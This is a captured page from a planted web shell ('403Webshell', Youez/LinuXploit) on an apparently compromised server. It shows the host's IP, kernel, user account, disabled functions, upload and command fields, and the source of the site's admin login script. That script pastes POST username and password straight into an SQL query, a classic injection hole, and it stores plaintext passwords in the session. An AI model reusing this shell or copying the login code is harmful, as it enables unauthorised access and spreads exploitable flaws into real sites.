403Webshell
Server IP : 103.233.193.20  /  Your IP : 216.73.216.169
Web Server : Apache/2
System : Linux host1.itclever.com 4.18.0-553.16.1.el8_10.x86_64 #1 SMP Thu Aug 8 17:47:08 UTC 2024 x86_64
User : oriscomadm ( 1120)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  /home/oriscomadm/domains/oriscom.com/private_html/admin/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/oriscomadm/domains/oriscom.com/private_html/admin/loginck.php
<?php
ob_start();
@session_start();
include'../include/db.php';
$sql = "select * from admin where username = '".$_POST['username']."' and password = '".$_POST['password']."'";
$result = mysql_query($sql) or die (mysql_error().$sql);
$row = mysql_num_rows($result);
$array = mysql_fetch_array($result);
if($row==1){
#$time = time()+3600;
#setcookie("username",$row['username'],$time);	
#setcookie("password",$row['password'],$time);	
$_SESSION['admin'] = $array['username'];
$_SESSION['password'] = $array['password'];
echo "<meta http-equiv='refresh'content='0;URL=index.php'>";
}else{
#setcookie("username");
#setcookie("password");
$_SESSION['admin'] = "";
$_SESSION['password'] = "";
echo "<center><font color=red><b>You can not login Please Try Again</b></font></center>";
echo "<meta http-equiv='refresh'content='2;URL=login.php'>";
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit